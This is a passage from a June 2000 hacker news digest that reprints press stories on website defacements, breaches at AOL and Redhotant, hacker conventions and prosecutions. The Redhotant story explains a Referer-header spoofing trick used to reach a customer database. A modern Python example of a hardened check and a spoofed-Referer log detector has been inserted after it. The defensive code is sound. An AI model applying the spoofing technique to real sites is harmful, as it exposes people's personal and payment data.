democracy movement on the Web site, until his arrest on Saturday. @HWA 272.0 [IND] Hacker's Humorous Tips to Websites ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 13/14 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061400a_j.shtml 6/14/00 Hacker's Humorous Tips to Websites KUALA LUMPUR: In a somewhat amusing vein, "Xenophoria,'' the hacker who hacked into anti-reformasi websites, went online yesterday to offer tips to pro-reformasi websites to protect them from being hacked. In a letter to Malaysiakini, Xenophoria advised the pro-reformasi webmasters to stop using the US-based Tripod service to host their websites. 
Saying the tripod.com security system was "rather weak,'' he added: "If Junior Hacker, who breached the Laman Reformasi website, found a hole in tripod.com, there is every possibility that other pro-reformasi websites would suffer the same fate. On Friday, the popular Laman Reformasi, also known as Mahazalim, was hacked by someone who called himself "Junior Hacker,'' who posted an obscene picture of a man sodomising another. This was an apparent reference to Datuk Seri Anwar Ibrahim, who is currently undergoing trial for allegedly committing sodomy. Tripod then cancelled the website's membership, stating that "storing adult content'' was in clear violation of the terms of service agreement. In the letter, Xenophoria said he had himself proven the tripod.com security system was rather weak by hacking the http://bnlist.com website. Tuesday, June 13, 2000 http://www.thestar.com.my/online/newsreport.asp?file=/2000/6/13/nation/1304szpa.asp&newspage=nation The Star @HWA 273.0 [IND] r00tfest 2000: Computer Hackers Ride into Town Today ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 14 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061400b_j.shtml 6/14/00 http://www.pioneerplanet.com/yhoo/mtc_docs/020426.htm Computer Hackers Ride into Town Today RiverCenter is site for `RootFest 2000' -------------------------------------------------------------------------------- LESLIE BROOKS SUZUKAMO STAFF WRITER -------------------------------------------------------------------------------- It's billed as the Midwest's largest computer security convention, but when the three-day RootFest opens in St. Paul's RiverCentre today, think of it simply as hackers' heaven. Heaven, after all, is supposed to be fun, and, in this case, for good hackers. 
And that's what RootFest hopes to promote -- hackers as the guys in the white hats who actually improve security on the Internet as they light up brain cells and hard drives trying to poke holes in computer security systems. ``A lot of the mainstream press and the public at large view hacking as synonymous with criminal activity. They believe every hacker is a criminal and that's just not true,'' said Michael Monson, RootFest's founder and organizer. ``Hacking isn't just about breaking into computers,'' Monson said. ``Hacking is about learning and making computers do things they were not originally designed to do -- taking it a step further. ``Making a program run faster or use less power would be a good hack,'' he said, as an example. Monson is a hacker. He's 21, soft-spoken and wears a goatee, a tiny silver stud in each earlobe, and a skinny ponytail over the collar of his neat white polo shirt and khaki slacks. No one online knows him as Monson, though. Instead, he's Lothos, named after the head vampire character from the ``Buffy the Vampire Slayer'' movie, and a member of the Legions of the Underground, a worldwide hackers community in cyberspace. He's also a computer network security engineer. He said it was two years ago when he conceived of RootFest with ``root'' -- in this case -- referring to a starting directory in a computer. He had heard about Defcon, another larger, older hacker convention held annually in Las Vegas, and thought, ``That's pretty cool. I wish I could go.'' He figured there were other hackers from the Midwest who couldn't afford a junket to Vegas, so he threw together the first RootFest at the Minneapolis Convention Center last spring. That effort attracted 200 people, primarily from the Midwest, but also from as far away as California and the Netherlands, he said. It's estimated that up to 1,000 may attend this year. The first convention also attracted attention, not all of it positive. 
The head of Minneapolis' information technology systems put out an e-mail that warned city computer users to be extra careful while the hackers were in town.

``Sometimes, these individuals hack into computers to perform fairly harmless computer pranks; however, that is not always the case,'' warned Don Saelens, the chief information officer for the city of Minneapolis.

No trouble was reported, however. Saelens said recently that he was responding to the fears of department heads who had heard about the convention ``and tend to respond a little emotionally.''

The 50-year-old information chief said his younger ``tool-smart'' staffers especially enjoyed the convention. Some of them even participated in the hacking contest, in which contenders lug their home computers into the convention center, plug into a network closed off from the Internet and try to hack into other contestants' computers.

``They really loved talking tech with each other,'' Saelens said.

Jim Kavaloski, director of information services for Ramsey County, said he is not concerned about the hackers hitting town. The county already uses state-of-the-art anti-virus software for its 2,900 personal computers, he said.

``When we talked about it, we asked ourselves what we could do and really, there's nothing more you can do,'' Kavaloski said, adding, ``The iloveyou virus came from the Philippines, after all. They don't need to be in St. Paul.''

Monson hopes law enforcement and computer security experts mingle with hackers and exchange ideas. Some security experts like himself once were hackers who thrilled to the challenge of penetrating a system in the same way that mountain climbers try to scale tall peaks -- because they are there.

John Edwards, a special agent with the Minnesota Bureau of Criminal Apprehension who specializes in computer crimes, agrees that not all hackers are malicious.
``The Bill Gateses and Steven Jobs of the world built all these computer companies, but they were once hackers,'' he said.

Sgt. Brook T. Schaub of the St. Paul Police Department, another computer crime specialist in the sex crimes unit, also divides hackers into the ``white hats'' and ``black hats'' -- those who pierce security systems and may install a banner announcing they were there and those who break into systems to wreak havoc or steal private data like credit card numbers.

However, Schaub noted that even white hats who hack simply for the joy of solving a difficult puzzle are committing, at the very least, a misdemeanor when they break into a system. Black hat hackers can receive up to 10 years in prison for felony break-ins that cause more than $2,500 in damage, he said.

Most hacking crimes go unreported, the officers said, because companies are not eager to reveal system vulnerabilities or scare their customers. Edwards estimates 80 percent of computer crime is committed by disgruntled employees or former employees, not outside hackers.

Monson said he and other hackers condemn destructive attacks such as those earlier this year that shut down systems serving sites like eBay and amazon.com. He hopes the convention will earn the hackers respect.

``I hope so,'' he said. ``I believe it will happen.''

--------------------------------------------------------------------------------
Leslie Brooks Suzukamo can be reached at lsuzukamo@pioneerpress.com or at (651) 228-5475.

Hackers, crackers and script kiddies

Not every hacker is a cracker, and all have a disdain for script kiddies. Here's a short ``who's who.''

Hacker. Someone who picks apart a computer system and delights in the intricacies. Sometimes, a hacker penetrates a computer's security system just to test the system's integrity, then notifies the owner of holes in the system. Other hackers tinker with systems the way hot-rodders tinker with cars, souping them up to run faster, smoother or use less power.
Cracker. A term most hackers use for hackers who specialize in penetrating or ``cracking'' into a computer system. Often, this term refers to hackers with malicious intent who attempt to wipe out data or steal it.

Script kiddie. A term of derision used to describe hackers/crackers who break into computer systems, not by writing their own computer code, but by copying prewritten code they find on the Internet. Most are young or don't have the skills needed to hack into a system by themselves.

@HWA

xx.x [IND] June 19 Hackers Steal Subscriber Data From AOL Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 19 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_061900a_j.shtml

6/19/00

Hackers Steal Subscriber Data From AOL Network
By Ariana Eunjung Cha, Washington Post Staff Writer

WASHINGTON, D.C., U.S.A., 19 Jun 2000, 12:07 PM CST

Hackers broke into America Online Inc.'s computer network this week and pilfered information such as names, addresses and credit-card numbers from some subscribers, company officials said late yesterday.

AOL spokesman Rich D'Amato said only "a very limited" number of the records of the company's more than 23 million subscribers had been accessed and that the company had begun contacting those customers directly. He said AOL was working with law enforcement officials to investigate the matter.

"We are taking these claims very seriously," he said. "We employ the highest level of security and we have already deployed additional security to prevent this from happening again."

D'Amato said hackers first compromised some employee accounts by tricking them into downloading a Trojan horse program that allowed them to hijack the accounts. They then used those customer service accounts to access subscriber data.
News about the security breach was posted Thursday on the Observers.net Web site, a popular gathering place for current and former employees and volunteers of AOL, and spurred the company's investigation, D'Amato said. The Observers.net site said information was stolen from about 500 subscribers.

Kelly Hallissey, one of the Observers.net site's administrators, said yesterday that the trouble began about a week and a half ago inside one of the Internet's original chat rooms. She said 20 to 30 people were in the chat room when one of them started bragging about how he could break into AOL. When challenged, he offered step-by-step instructions on how to get into the company's Customer Relations Information System.

"Someone ran his mouth and the next thing I knew everyone was talking about how to break in," she remembered.

On Thursday, Hallissey said she logged on to find several e-mails with screen shots of her own records, including the entire credit-card number she had used to sign up to AOL.

AOL's status as the world's largest online service makes it a popular target for hackers. Last October, a teenager pleaded guilty to altering data and programs on AOL's internal systems, which would cost $50,000 to fix.

Mark Chen, chief technology officer at Palo Alto, Calif.-based Securify.com, said the latest attack on AOL was fairly simple but deadly, because once someone gets through the security perimeter, he has access to "all the powers of a person on the inside."

A Colorado Springs teen who goes by the online moniker Ytcracker -- and was one of the authors of the Observers.net posting -- said he is part of a group of seven young men who spend their time probing the vulnerabilities of AOL's vast network.

"It's a pretty interface and it looks secure enough. But when you dig down deep, there is a lot of stuff you can compromise," he said in an interview.
@HWA

274.0 [IND] UK Watchdog Warns Net Banks Over Hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 20 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_062000a_j.shtml

6/20/00

UK Watchdog Warns Net Banks Over Hackers
By Sylvia Dennis, Newsbytes

LONDON, ENGLAND, 20 Jun 2000, 7:24 AM CST

The Financial Services Authority (FSA), the UK's financial services regulator, has told banks that they must take more care with their online security. The warning comes after the FSA found inadequacies in defense systems against hackers on the sites of several unnamed UK Internet banks.

Speaking on Monday at the British Bankers Association, Howard Davies, the chairman of the FSA, said that online banks also need to pay more attention to strategy and to coping with unexpectedly large numbers of users.

Davies added that the FSA's research had identified the key risks that banks must manage as they introduce and develop their e-banking services. He said that there is a definite need for senior management to be firmly in charge of their Internet strategies, as well as to effectively manage their security risks.

In his speech, he also outlined the reputation risks of rushing products to the market too early, with the result that online users became frustrated with problems they encounter.

Davies added that there is also a strategic and business risk with online banking services. Senior management, he said, needs to be firmly in charge of the direct effects of their Internet strategies, and of the potential indirect effects on the underlying profitability of their business.

"There is a risk that people with strong technological, but weak banking skills can end up driving e-initiatives. One consequence may be that these initiatives do not attract the types of customers that banks want or expect, and may have unexpected implications for existing business lines," he said.

"Banks may face new competition too.
E-banks are easy to set up, so lots of new entrants are arriving on the scene. And old-world systems, cultures and structures do not encumber these new entrants," he added.

This issue, he went on to say, was closely linked to business risk, key elements of which, such as the ability to assess credit and liquidity risk, present themselves in new guises in an e-banking world.

The good news for the e-banking world, Davies told his City audience, is that UK banks have found little evidence of material success for hackers.

"This suggests that, for the moment, they have in place sufficiently robust barriers to repel attacks attempted on their gateways," he said, adding that banks should be careful not to get too confident about the issues involved.

"While banks tend to have reasonable perimeter security, we have sometimes found insufficient segregation between internal systems, and poor internal security. So we are encouraging banks to look at the firewalls between their different systems to ensure adequate damage limitation should an external breach occur," he said, adding that, as ever, the greatest threat so far has been from the enemy within.

Davies said that it is now very difficult in the Internet environment to predict and manage the volume of customers that e-banks will obtain. Many banks going online, he said, have significantly misjudged volumes, usually making estimates which turn out to be too cautious.

"When a bank has inadequate systems to cope with demand there may be both financial and reputational damage, and even compromises in security," he said.

The FSA's Web site is at http://www.fsa.gov.uk .
@HWA

275.0 [IND] Hacker Attacks Gun Control Group's Web Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 21 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_062100a_j.shtml

6/21/00

Hacker Attacks Gun Control Group's Web Site
By Martin Stone, Newsbytes

WASHINGTON, DC, U.S.A., 21 Jun 2000, 7:34 AM CST

The Web site of nonprofit gun-control group Violence Policy Center was reportedly attacked by an apparently pro-gun hacker who left the message, "If you take my guns, I still have my computer. VPC just got shot in the head."

An Associated Press report today said the site was also defaced with images of bombs, a skull and crossbones and obscenities. In addition, the report said, all of the group's e-mail had been rerouted to the hacker.

The intrusion was discovered Monday and reported to the FBI, according to the report. The group's domain name registrar, Network Solutions Inc. of Herndon, Va., was asked to restore the VPC Web address. Network Solutions said the process would take 12 to 24 hours.

AP said that public Internet registration records showed the "vpc.org" name to be registered to a Ted Torian, which appeared to be an alias, at an address in Los Angeles. VPC said it has no knowledge of that name, and though the group has a Los Angeles office, it's not at that address and the phone numbers listed on the registration records are not in service.

An e-mail apparently intercepted by the hacker had been rerouted to an anonymous Yahoo mail account and the AP said investigators discovered the account had been accessed through a computer at the University of Nebraska at Lincoln.
@HWA

276.0 [IND] Hackers Attack Nike, United Arab Emirates Sites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 22 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_062200a_j.shtml

6/22/00

Hackers Attack Nike, United Arab Emirates Sites
By Martin Stone, Newsbytes

MONTREAL, QUEBEC, CANADA, 22 Jun 2000, 7:07 AM CST

Hackers struck at two prominent Web sites Wednesday, one belonging to sportswear giant Nike Corp. in an apparent attempt to disrupt an economic forum in Australia, the other operated by the government of the United Arab Emirates.

An Associated Press report today said officials at Nike notified the FBI after discovering a hacker had diverted access from its Web site to a site devoted to disrupting an international economic forum in Australia. The report said Nike computers were never breached and its electronic security protected all online customers.

A Reuters report today said a British man is in custody under suspicion for hacking into the UAE Internet system. He faces charges of damaging the country's economy, according to local newspaper reports today.

Reuters said the 26-year-old man, a senior computer engineer in Dubai, was arrested last week after being traced by Emirates Telecommunications Corp. (Etisalat) security staff.

The reports cite Dubai police chief Major General Dhahi Khalfan Tamim as saying the unidentified Brit could be charged with damage to the UAE economy if shown he destroyed data in the Web system. Dubai does not have specific computer crimes laws, but the suspect could receive up to 10 years in prison, the reports said.

Reuters said Etisalat officials blame the suspect for much of the disruption experienced by local Web users in the past two weeks.

Dubai has been pushing to become a regional hub for information technology and electronic commerce and last year invested $200 million in establishing an e-commerce and IT free-trade zone, called Dubai Internet City.
Associated Press said that for six hours access to the Nike site was diverted through computers operated by various Internet service providers, including FirstNET Online in Edinburgh, Scotland, to the destination, http://www.s11.org, a page proclaiming "Global justice is coming - prepare now!" The page also included messages urging protesters to gather Sept. 11-13 at the World Economic Forum in Melbourne, Australia.

The s11 Web site uses British spellings and describes itself as part of a "network of organisations, affinity groups and individuals that all share a common concern about the growth of corporate power and the direction of globalisation," the AP report said.

@HWA

277.0 [IND] Rock Band's Answer To Napster: Sabotage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 22 2000
Source: www.infowar.com
http://www.infowar.com/hacker/00/hack_062200b_j.shtml

6/22/00

Rock Band's Answer To Napster: Sabotage
By Kevin Featherly, Newsbytes

OAKLAND, CALIFORNIA, U.S.A., 22 Jun 2000, 12:42 PM CST

From the left bank of the US, Oakland, Calif., there is fomenting a plot to overthrow the much-blasted Napster music file-sharing system - by using Napster against itself.

A Web site belonging to the obscure Clash-meets-Lou-Reed rock combo The Tabloids (http://www.stopnapster.com ), is publicly campaigning for guerrilla tactics against the MP3-swapping service that many contend is violating artists and record labels' copyrights by allowing users to give music to each other without paying for the pleasure.

And the plan, according to the site, is sabotage. The site encourages anti-Napsterites to use Napster itself to send out "Trojan Horses" and "Napster bombs" to disrupt the service - while causing no harm to anyone's computer.

"Here's a suggestion for making effective electronic counter measures that thwart MP3 file sharing in violation of copyright laws," said the site, which is registered to Tabloids lead singer, songwriter and guitarist Michael Robinson.
"From now on, prerecorded music is released in two digital formats: the original compact disc as well as Trojan Horse MP3 files, which are non-destructive, digital decoys."

The result? Say a user downloads one of Eminem's new releases. They are happily listening to the purloined tune when suddenly Charlton Heston begins reading a public interest message opposing song theft.

"The Trojan Horse does nothing to hurt your hard drive, computer or files," the site says. "But it's annoying."

The effort has done very little to ingratiate the band with hardcore Napster users, who have taken to online chat sessions in droves to decry the band's technological short-sightedness and to accuse Robinson and crew of exploiting the Napster controversy to put their little-known band in the public eye.

All of which, Michael Robinson says, couldn't matter less.

"My wife and I sat down and just went through all of the objections that people would have," Robinson told Newsbytes this morning. "It's like a ping-pong ball hitting a tank as far as I'm concerned. It doesn't hit me, I don't care, because really, ultimately, I have a history of speaking out on issues."

True enough. Robinson is not your average high school dropout who formed a punk-rock group. He is a former journalist, a professional photographer, and a published author whose now out-of-print 1990 book, "Overdrawn," took on the late 1980s savings and loan crisis.

"The constitutional aspect of this is really what is driving me more than anything else," he said. "I thought about it long and hard, my wife and I went through a lot of skull sessions. And I'm not going to sit on the sidelines of this fight."

As for accusations that he is engaging in a publicity stunt, Robinson has this retort.

"They can think whatever they want; it doesn't matter or faze me. My default is that I'm amazed by the implications of this. If you think about it, if this Napster thing continues, then everything is up for grabs.
Your song can be used on a soundtrack without your permission, Coca-Cola could use your songs in an advertisement. If you don't put this as a Maginot Line right now, where does it go? What about patents, what about authors, what about photographers?"

The issue arises at a time when the industry, and some artists, are pulling together to take aim at music file-sharing, and Napster is the target's bull's-eye. The Recording Industry Association of America, representing a number of major record labels, is suing the service and seeking to shut it down. The Wall Street Journal reported today that a group called Artists Against Piracy, also backed by the labels, is planning an anti-Napster media blitz this summer.

Robinson, who says he is not affiliated with the major labels, said his target is not primarily Napster users themselves, but political leaders whose job it is to shape and create laws, and to protect the old ones.

Robinson cites the US Constitution's Article 1, Section 8, as proof that the activity Napster and its users are engaging in is illegal and unconstitutional. That section says Congress shall have the power "to promote the progress of science and useful arts, by securing for limited times to authors and inventors the exclusive right to their respective writings and discoveries."

A survey released yesterday indicated that Napster users do not agree. The nationwide survey of 300 adults who download music off the Internet conducted by Connecticut-based market research firm InsightExpress, indicates that nearly half of Napster users surveyed feel the service does not violate federal copyright statutes. And more than half feel they are not themselves guilty of violating copyright law when using Napster.

Again, Robinson is unmoved.

"It's not for the great unwashed to decide what's in my best interests," he said. "Ten million people should not have the technological weapon to rip off thousands of other people who do not have the technology to combat them.
That's not what America stands for."

Likewise, frequent arguments that Napster and its many clones actually drive sales because they expose people to music they never heard before - an argument given weight by a recent study of 17,000 users by Yankelovich Partners Inc. - also are meaningless to Robinson.

"I feel like it's not for a group of people to look at some survey and say, 'Hey, it's going to be good in the long run,'" the musician said. "It's not their right to make that decision. It belongs to the copyright holder. It's their decision and no one else's."

And he is unswayed by prevailing arguments from people like Public Enemy rapper Chuck D., holding that Napster represents a technological tide that cannot be turned.

"That's the thing about the technology. But just because the cops can tap your phone doesn't mean they should," Robinson said. "One of the things that's implicit in the site is we're asking for legislation. We're trying to raise the constitutional issue. We're saying you can't just get rid of (copyright protections) because it's inconvenient. We as a nation have got to come to some sort of consensus on this."

The Stop Napster site is online at http://www.stopnapster.com .

@HWA

278.0 [IND] Pro-gun Hackers Take Over Web Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 26 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_062600a_j.shtml

6/26/00

Pro-gun Hackers Take Over Web Site

For a while at least, the 10 or so employees of the Violence Policy Center tried to remain blasé after their Web site was hijacked Monday by anti-gun control hackers, their usual home page replaced by a clunky gray box with a bomb and a skull and crossbones. Josh Sugarmann, VPC's executive director, figured the site could be restored in a matter of hours, and refrained from trying to fix the site in order to "leave the crime scene untouched" for the FBI.
Tuesday, however, he learned that the cyberterrorists didn't just hack on to their site, linking to pro-gun groups, erasing mountains of data (which VPC luckily had saved) and gloating onscreen about getting rid of VPC's "propagandist bullshit." They also stole the group's Web identity.

Apparently, the hackers figured out a way to actually take over access to the site, which is licensed to VPC by Network Solutions. So until Sugarmann finds out how to wrest control away from them, the hackers are masters of the group's domain. That includes incoming e-mail to VPC from its Web address, which makes Sugarmann concerned for the safety of the senders.

Then, in more bad news, the FBI told Sugarmann that the hacking doesn't become a blip on the FBI's radar screen until the group can prove it has incurred $5,000 in damages -- a serious hurdle for a nonprofit organization, because its losses are largely confined to the labor required to fix the hacking mess. Its product is information, which it gives away for free, so assessing damages becomes a guessing game. "These are standards that are put in place for for-profit entities," he said.

VPC is a fairly frequent target of gun advocates -- and vice versa. The group is a rising star among gun control groups, most recently scrapping with the NRA over its feathered and kid-friendly mascot, Eddie Eagle, and its plans for a Times Square theme restaurant. In turn, the NRA has taken personal swipes at Sugarmann, and the pro-gun press repeatedly lambastes him and his group.

In a way, the attack may have been inevitable. Sugarmann says gun advocates have always been pioneers in communication technology. "They were the first to use computer bulletin boards, they were the first to use the Web, they were the first to use blast fax," he said. "They are way ahead of organizations on our side of the issue."

Gun advocates have cloned gun control sites in the past.
Handguncontrol.net, a pro-gun site, mirrors the anti-gun Handguncontrol.org, just as Center for the Prevention of Handgun Violence has its own doppelganger. VPC seemed immune to these attacks, since the likely addresses -- vpc.net and vpc.com -- are owned by groups unrelated to the gun issue.

Gun rights activists may not settle for cloning anymore. According to Sugarmann, those groups could now start aggressive hack attacks against other anti-gun organizations, having been emboldened by their temporary triumph over VPC. "In pro-gun cyberspace," he says, "this is a big victory."

By Alicia Montgomery
June 21, 2000
http://www.salon.com/politics/feature/2000/06/21/guns/index.html

Pro-gun hackers take over Web site
And a prominent group of gun critics is still trying to get it back.

About the writer: Alicia Montgomery is an assistant editor in Salon's Washington bureau.

@HWA

279.0 [IND] Hacker Taps Into 24,000 Credit Cards
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6/26/00

Hacker Taps Into 24,000 Credit Cards
Maurice Chittenden
June 25 2000
BRITAIN

A COMPUTER hacker has breached the security of a pioneering internet service provider to obtain the names, addresses, passwords and credit card details of more than 24,000 people.

The victims include scientists at the top-secret Defence Evaluation and Research Agency, senior officials in the government, BBC bosses and executives at companies such as Shell, Barclaycard and Halifax.

The hacker, an information technology consultant, says that he targeted Redhotant to expose security lapses. The Kent-based company is at the forefront of a new style of internet provision: subscribers pay as little as £30 a year for unlimited access to the web with no additional phone charges. It aims to attract half a million users in Britain, but its critics say it is failing to cope with demand.
Trading standards officers are investigating complaints that people have had difficulty getting online, although the company claims to have a line for every nine customers. The company, which has taken up to £1.5m in subscriptions, says it plans to double capacity. Last week it was offline for several days and blamed a technical hitch after a thunderstorm.

The consultant who obtained the details of Redhotant's subscribers broke the data protection law but says he did it only out of public interest to highlight lack of security.

He used a proxy, a device normally used for disguising the identity of a user, as an intermediary to search the site for files. Among them he found the customer database. Only those connected to the company's internal network are supposed to access it. The hacker got around this by typing in: "referrer: the intranet site".

He said: "It was child's play. I didn't actually need to hack in the normal sense because I didn't need any passwords. It was like rooting around in bins for a key and then finding there was a wide-open side entrance.

"Redhotant's biggest mistake was keeping its own records on the same disk and machine as all its services."

He added: "I sent them a couple of e-mails alerting them to the problem but they ignored it. The lesson is simple. Don't put anything on a website that you wouldn't put on a billboard."

Redhotant is part of the Jak internet group, which operates from offices near the Channel Tunnel in Kent. Kevin Packwood, a director, said he was unaware of the security breach. He said: "I would be very surprised if somebody could get that far. Our security measures should have been able to see it happening and alarms would have sounded."
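The weakness the consultant describes is an "internal only" check that trusts the client-supplied Referer header. The Python below is an added example, not code from the article or from Redhotant: it puts that Referer-trusting rule next to a hardened one that looks at the peer address and a server-side session instead, and adds a log check that flags requests claiming an intranet Referer while arriving from an outside address. The address range, intranet origin, paths, user names and log lines are all constructed for the example.

```python
import re
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional

# Constructed for this example: the internal range the customer database was
# meant to be reachable from, the intranet site name a spoofed Referer would
# claim, the protected path and the staff accounts allowed to see it.
INTRANET_NET = ip_network("10.0.0.0/8")
INTRANET_ORIGIN = "http://intranet.example.internal"
PROTECTED_PREFIX = "/customers/"
STAFF_USERS = {"ops-alice", "billing-bob"}


@dataclass
class Request:
    client_ip: str
    path: str
    referer: str                     # whatever the client chose to send
    session_user: Optional[str] = None   # set only from a server-side session


def weak_is_internal(req: Request) -> bool:
    """The rule the article describes: trust a client-supplied Referer.
    Any client can send any Referer, so this proves nothing about origin."""
    return req.referer.startswith(INTRANET_ORIGIN)


def strong_is_internal(req: Request) -> bool:
    """Hardened rule: the peer address must be inside the internal range AND
    the request must belong to an authenticated staff session. Referer is
    ignored entirely because it is under the client's control."""
    return (ip_address(req.client_ip) in INTRANET_NET
            and req.session_user in STAFF_USERS)


def authorize(req: Request, check) -> bool:
    """Apply an access rule to requests under the protected path only."""
    if not req.path.startswith(PROTECTED_PREFIX):
        return True
    return check(req)


# Combined Log Format with the Referer and User-Agent fields, for example:
# 203.0.113.9 - - [25/Jun/2000:10:01:02 +0100] "GET /customers/db.csv HTTP/1.0" 200 5120 "http://intranet.example.internal/" "Mozilla/4.0"
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)


def parse_clf(line: str) -> Optional[dict]:
    """Return the named fields of one access-log line, or None if malformed."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def audit_log(lines) -> list:
    """Detection: a hit on the protected path whose Referer claims the intranet
    site but whose source address is outside the internal range is a spoofed
    header and should raise an alert."""
    suspects = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue
        if (rec["path"].startswith(PROTECTED_PREFIX)
                and rec["referer"].startswith(INTRANET_ORIGIN)
                and ip_address(rec["ip"]) not in INTRANET_NET):
            suspects.append(rec)
    return suspects


# Constructed sample log lines: one genuine internal hit, one spoofed Referer
# from an outside address, one harmless public-page hit.
SAMPLE_LOG = [
    '10.1.2.3 - - [25/Jun/2000:09:58:41 +0100] "GET /customers/db.csv HTTP/1.0" 200 5120 "http://intranet.example.internal/" "Mozilla/4.0"',
    '203.0.113.9 - - [25/Jun/2000:10:01:02 +0100] "GET /customers/db.csv HTTP/1.0" 200 5120 "http://intranet.example.internal/" "Mozilla/4.0"',
    '203.0.113.9 - - [25/Jun/2000:10:01:05 +0100] "GET /index.html HTTP/1.0" 200 812 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    outsider = Request("203.0.113.9", "/customers/db.csv", INTRANET_ORIGIN + "/")
    print("weak rule admits outsider:  ", authorize(outsider, weak_is_internal))
    print("strong rule admits outsider:", authorize(outsider, strong_is_internal))
    for rec in audit_log(SAMPLE_LOG):
        print("ALERT spoofed intranet Referer from", rec["ip"], "to", rec["path"])
```

The second point in the article, records kept on the same machine as the public services, is not something a header check fixes; the strong rule only limits who can read the path, so the database still belongs on a separate host.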
http://www.the-times.co.uk/news/pages/sti/2000/06/25/stinwenws01002.html

@HWA

280.0 [IND] Etisalat Vows to Prosecute Internet Hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 28 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_062800a_j.shtml

6/28/00

Etisalat Vows to Prosecute Internet Hackers

DUBAI (Reuters) - United Arab Emirates telecoms firm Etisalat has vowed to prosecute hackers into the country's Internet system and described as ``baseless'' lawsuits by a Briton alleged to have disrupted online services earlier this month.

``It is appalling to think that any of these 'hackers' can infiltrate a computer security system and cause absolute chaos with direct economic consequences,'' Etisalat's lawyer, Hamad Kadfoor al-Mehairi, said in a statement received by Reuters on Wednesday.

``We have a duty at Etisalat and the government of the UAE to safeguard the confidentiality of our customers to ensure complete trust in the system. We will not hesitate in prosecuting anyone who abuses the system,'' he added.

Lee Alan Ashurst, 21, of Manchester, suspected by Etisalat officials of hacking and blamed for disruption experienced by some local Internet subscribers earlier this month, has denied the accusations and said he had filed lawsuits for defamation and damages against Etisalat.

``I have no idea what they (Etisalat) are talking about, I am being used as a scapegoat,'' Ashurst told a news conference on Monday. ``I have lost my job, my company car and apartment as a result of these accusations and I am suing Etisalat for defamation and damages,'' he added.

Mehairi said Etisalat viewed the lawsuit as ``baseless and simply a diversionary tactic.''

Mehairi said hacking into the Internet system endangered electronic commerce in the UAE and was punishable under the law by up to ten years in jail.
Dubai is trying to build on its reputation as a regional trading hub to attract international information technology firms to set up bases at a $272 million free trade zone for electronic commerce scheduled to open later this year.

Local media on Monday quoted Dubai's Attorney General Ibrahim abu Melha as saying a committee of computer experts was looking into the case and would examine statements from both Etisalat and Ashurst.

``Once the technical report is made public, the seriousness of the crime would be obvious. Although many of the younger generation view the Internet as a challenging game or pastime, we have to protect the commercial interest of the United Arab Emirates,'' Mehairi said.

@HWA

281.0 [IND] Foundstone's Ultimate Hacking Course Available at Black Hat Briefings
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 28 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_062800b_j.shtml

6/28/00

Company Press Release

Foundstone's Ultimate Hacking Course Available at Black Hat Briefings
'White Hat' Consultants Offer Popular Computer Security Training July 24-25

IRVINE, Calif.--(BUSINESS WIRE)--June 28, 2000--Foundstone Inc., the leading ``white hat'' computer security training and consulting company, and Black Hat Briefings today announced that Foundstone's Ultimate Hacking: Black Hat Edition course will be offered July 24-25 in conjunction with the Black Hat Briefings 2000 conference in Las Vegas that week.

The latest addition to Foundstone's renowned security training program, Ultimate Hacking: Black Hat Edition is an intensive, hands-on course designed for system administrators, network engineers, and others who work at the ``front lines'' protecting their organizations from hacker attacks. Scheduled for the two days preceding the Black Hat Briefings, the course is a complement to the annual gathering of corporate and ``underground'' security specialists.
``The top security professionals from around the world come to the Black Hat Briefings to mingle with the enemy,'' said George Kurtz, Foundstone CEO. ``They come because they know in order to protect a network, they must understand how a hacker works. And that's what Ultimate Hacking will show them.''

In Ultimate Hacking: Black Hat Edition, course participants will learn from Foundstone's all-star team of experienced security professionals, including the co-authors of Hacking Exposed: Network Security Secrets and Solutions. Written by the company's founders, this best-selling guide exposes hacker techniques and methods to defend against them.

``I strive to put together the best security conferences and pre-show training that I can,'' said Jeff Moss, Founder and President of Black Hat, Inc. ``To meet that expectation, we have partnered with Foundstone. Not only can they walk the walk, but collectively they have years of experience in breaking into Corporate America and defending against hacker threats.''

Ultimate Hacking: Black Hat Edition training will take place in a fully configured classroom lab to dramatically illustrate the critical vulnerabilities in Windows and Unix systems and the latest countermeasures for them.

``The best way for participants to gain this knowledge and sharpen their skills is to 'learn-by-doing' in a hands-on environment,'' said Kurtz.

Topics covered will include ``Assessing and Penetrating NT and Unix Networks and Hosts'', ``Securing NT and Unix Hosts'', and ``Identifying Common E-Commerce Web Vulnerabilities''.

